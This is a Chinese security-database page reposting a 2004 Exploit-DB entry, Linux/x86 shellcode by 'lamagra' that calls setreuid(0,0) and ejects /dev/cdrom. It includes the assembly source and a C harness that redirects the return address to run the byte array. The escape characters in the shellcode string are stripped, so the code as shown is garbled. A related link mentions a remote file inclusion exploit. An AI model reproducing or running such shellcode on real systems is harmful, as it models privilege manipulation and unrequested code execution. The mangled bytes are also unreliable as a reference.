Linux/x86 – Eject /dev/cdrom Shellcode (64 bytes)-安全小百科

Linux/x86 – Eject /dev/cdrom Shellcode (64 bytes)

漏洞ID	1054654	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13439

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
        CDROM EJECTING CODE by lamagra

.data
.globl main
        .type    main,@function
_start:
        # setreuid (0, 0)
        xorl %eax,%eax
        xorl %ebx,%ebx
        xorl %ecx,%ecx
        xorl %edx,%edx
        movb $70,%al
        int  $0x80

        jmp 0x21
        popl %esi
        movb %edx,10(%esi)
        leal (%esi), %ebx
        # open("/dev/cdrom", O_RDONLY|O_NONBLOCK|0x4, 666)
        movb $5, %al
        movw $0x804, %cx
        movw $666, %dx
        int $0x80

        movl %eax, %ebx

        # ioctl(%eax, 0x5309, 0)
        movb $54, %al
        movw $21257, %cx

        int $0x80

        # exit(0)
        xorl %eax, %eax
        xorl %ebx, %ebx
        inc %eax
        int $0x80
        call -0x26
	.string "/dev/cdrom"
*/
#include <stdio.h>

char eject[] = 
"x31xc0x31xdbx31xc9x31xd2xb0x46xcdx80xebx23x5ex88x56x0ax8d"
"x1exb0x05x66xb9x04x08x66xbax9ax02xcdx80x89xc3xb0x36x66xb9"
"x09x53xcdx80x31xc0x31xdbx40xcdx80xe8xd8xffxffxff/dev/cdrom";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(eject));
        (*ret) = (int)eject;
}

// milw0rm.com [2004-09-26]

相关推荐: Koch Roland Rolis Guestbook 1.0 – ‘$path’ Remote File Inclusion

Koch Roland Rolis Guestbook 1.0 – ‘$path’ Remote File Inclusion 漏洞ID 1054256 漏洞类型发布时间 2003-11-17 更新时间 2003-11-17 CVE编号 N/A CNNVD-…

文章版权归作者所有，未经允许请勿转载。

THE END